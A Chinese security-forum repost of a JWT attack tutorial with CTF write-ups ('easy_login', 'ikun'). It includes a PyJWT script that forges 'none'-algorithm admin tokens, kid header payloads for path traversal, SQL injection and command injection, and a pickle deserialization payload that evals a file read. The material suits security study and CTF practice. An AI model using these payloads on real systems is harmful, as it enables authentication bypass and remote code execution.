安全矩阵

 找回密码
 立即注册
搜索
查看: 2400|回复: 0

JWT攻击学习

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2021-4-15 22:20:04 | 显示全部楼层 |阅读模式
原文链接:JWT攻击学习

JSON Web Token(JWT)是一种用于通信双方之间传递安全信息的简洁的、URL安全的表述性声明规范,经常用在跨域身份验证


cookie /session /jwt 不同点

1.对于一般的cookie,如果我们的加密措施不当,很容易造成信息泄露,甚至信息伪造,这肯定不是我们期望的。

2.session:客户端在服务端登陆成功之后,服务端会生成一个sessionID,返回给客户端,客户端将sessionID保存到cookie中,session保存在服务端,当客户访问量增加时,服务端就需要存储大量的session会话,对服务器有很大的考验

3.jwt:在身份验证中,当用户使用他们的凭证成功登录时,JSON Web Token将被返回并且必须保存在本地
客户端身份经过服务器验证通过后,会生成带有签名的 JSON 对象并将它返回给客户端。客户端在收到这个 JSON 对象后存储起来
在以后的请求中客户端将 JSON 对象连同请求内容一起发送给服务器,服务器收到请求后通过 JSON 对象标识用户,如果验证不通过则不返回请求的数据。
验证不通过的情况有很多,比如签名不正确、无权限等。在 JWT 中服务器不保存任何会话数据 ,使得服务器更加容易扩展。
构成它的构成:第一部分我们称它为头部(header),第二部分我们称其为载荷(payload, 类似于飞机上承载的物品),第三部分是签证(signature).
类似于:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIyMzMzIiwibmFtZSI6Im5wZnMiLCJhZG1pbiI6dHJ1ZX0.mcHAMzOrqyqLk5-tmWVp1-zdlqIVcOdv-39oQIoOWoQ

headerjwt的头部承载两部分信息:
声明类型,这里是jwt
声明加密的算法 通常直接使用 HMAC SHA256
完整的头部就像下面这样的JSON:

{
'typ': 'JWT',
'alg': 'HS256'
}

payload载荷就是存放有效信息的地方。这些有效信息包含三个部分
  • 标准中注册的声明
  • 公共的声明
  • 私有的声明

标准中注册的声明 :
  • iss: jwt签发者
  • sub: jwt所面向的用户
  • aud: 接收jwt的一方
  • exp: jwt的过期时间,这个过期时间必须要大于签发时间
  • nbf: 定义在什么时间之前,该jwt都是不可用的.
  • iat: jwt的签发时间
  • jti: jwt的唯一身份标识,主要用来作为一次性token,从而回避重放攻击。

公共的声明
公共的声明可以添加任何的信息,一般添加用户的相关信息或其他业务需要的必要信息.但不建议添加敏感信息,因为该部分在客户端可进行解码.
私有的声明
私有声明是提供者和消费者所共同定义的声明,一般不建议存放敏感信息。

{
"sub": "1234567890",
"name": "purplet",
"admin": true,
"secretid": 1
}


signaturejwt的第三部分是一个签证信息,这个签证信息由三部分组成:
  • header (base64后的)
  • payload (base64后的)
  • secret

这个部分需要base64加密后的header和base64加密后的payload使用.连接组成的字符串,然后通过header中声明的加密方式进行加盐secret组合加密,然后就构成了jwt的第三部分。加密方式如下。
  1. // javascript
  2. var encodedString = base64UrlEncode(header) + '.' + base64UrlEncode(payload);

  3. var signature = HMACSHA256(encodedString, 'secret');
复制代码

最后将这三部分用.连接成一个完整的字符串,构成了最终的jwt。



jwt解密网站

攻击方法签名无效当用户端提交请求给应用程序,服务端可能没有对token签名进行校验,这样,攻击者便可以通过提供无效签名简单地绕过安全机制。
直接修改payload内容,生成新token

空加密算法JWT支持使用空加密算法,可以在header中指定alg为None
将secret置空。利用node的jsonwentoken库已知缺陷:当jwt的secret为null或undefined时,jsonwebtoken会采用algorithm为none进行验证
因为alg为none,所以只要把signature设置为空(即不添加signature字段),提交到服务器,token都可以通过服务器的验证


import jwt
token = jwt.encode(
{
"user": "admin",
},
algorithm="none",key=""
).decode(encoding='utf-8')

print(token)
这里需要安装pyjwt库
pip install PyJWT



修改算法RS256为HS256(非对称密码-->对称密码)JWT中最常用的两种算法为HMAC和RSA
HMAC(HS256):是一种对称加密算法,使用秘密密钥对每条消息进行签名和验证
RSA(RS256):是一种非对称加密算法,使用私钥加密明文,公钥解密密文。
在这两种算法中都是使用私钥对signature字段进行签名,只有拿到了加密时使用的私钥,才有可能伪造token。
如果将算法从RS256更改为HS256,后端代码会使用公钥作为秘密密钥,然后使用HS256算法验证签名。由于公钥有时可以被攻击者获取到,所以攻击者可以修改header中算法为HS256,然后使用RSA公钥对数据进行签名。更改算法为HS256,即不存在公钥私钥问题,因为HMAC对称密码算法只有一个key


爆破密钥JWT 的密钥爆破需要在一定的前提下进行:
  • 知悉JWT使用的加密算法
  • 一段有效的、已签名的token
  • 签名用的密钥不复杂(弱密钥)

c-jwt-cracker

这里运行之前需要些输入make命令,创建一个jwtcrack文件


修改KID参数kid是jwt header中的一个可选参数,全称是key ID,它用于指定加密算法的密钥。我们可以通过修改kid参数进行目录遍历、sql注入、命令注入等攻击
  1. #目录遍历
  2. {
  3.     "alg" : "HS256",
  4.     "typ" : "jwt",
  5.     "kid" : "/etc/passwd"
  6. }
复制代码
  1. #sql注入
  2. {
  3.     "alg" : "HS256",
  4.     "typ" : "jwt",
  5.     "kid" : "aaaaaaa' UNION SELECT 'key';-- "
复制代码
  1. #命令执行
  2. {
  3.     "alg" : "HS256",
  4.     "typ" : "jwt",
  5.     "kid" : "/path/to/key_file|whoami"
  6. }
复制代码

修改JKU/X5U参数
类似于kid ,可以由用户进行输入,如果没有经过严格过滤,就可以指定一组自定义的密钥文件,并指定web应用使用该组密钥来验证token。
JKU全称是“JWKSet URL”,它是头部的一个可选字段,用于指定链接到一组加密token密钥的URL。若允许使用该字段且不设置限定条件,攻击者就能托管自己的密钥文件,并指定应用程序,用它来认证token。
XSU头部参数允许攻击者用于验证Token的公钥证书或证书链


信息泄露直接将payload用base64解密,发泄一些敏感信息


easy_login



分别访问这两个文件,可以猜测出存在controllers/api.js
这里是怎么猜出来的,看了赵总的WP,凭经验
koa框架主要目录:




这里总的来说就是要在sid不为 undefined,null,并且必须在全局变量 secrets 数组的长度和 0 之间的前提下,使sid不能作为为全局变量 secrets 数组的索引,那么 secret 就会为空了
secretid可以利用空数组绕过( JavaScript 是一门弱类型语言,空数组与数字比较永远为真)





所以总的做法就是生成一个 secretid 为空数组的令牌,username 设置为 admin,加密方式为 none(空加密算法),即可绕过验证,使得最后登录时验证的用户名为 admin

import jwt
token = jwt.encode(
{"secretid":[],
"username":"admin",
"password":"888"},
algorithm="none",key=""
).decode('utf-8')
print(token)
==> eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzZWNyZXRpZCI6W10sInVzZXJuYW1lIjoiYWRtaW4iLCJwYXNzd29yZCI6Ijg4OCJ9.

ikun

这里提示我们购买lv6,写个脚本跑一下

import requests
url="http://4134c719-6874-41bc-962f-ab08697fbc16.node3.buuoj.cn/shop?page="
for i in range(0,2000):
r=requests.get(url+str(i))
if 'lv6.png' in r.text:
print (i)
break

--》lv6在181页



抓包,查看cookie可以看到一段JWT,看到JWT长度较短,所以考虑利用工具将JWT的第三段密钥爆破出来



接下去就是考察python反序列化,感兴趣的同学可以自己去做一下
利用reduce函数
反序列化后产生的对象会在结束时触发reduce()函数从而触发恶意代码。
  1. import pickle
  2. import urllib.parse

  3. class payload(object):
  4.     def __reduce__(self):
  5.         return (eval, ("open('/flag.txt','r').read()",))

  6. a = pickle.dumps(payload(),protocol=0)
  7. a = urllib.parse.quote(a)
  8. print (a)
复制代码

序列密码  
https://www.hetianlab.com/expc.do?ec=ECIDced7-a94a-44af-af5a-a433ed1bee97&pk_campaign=weixin-wemedia#stu   
序列密码也称为流密码(Stream Cipher),它是对称密码算法的一种。通过本实验,了解序列密码



















回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-9-21 05:48 , Processed in 0.013321 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表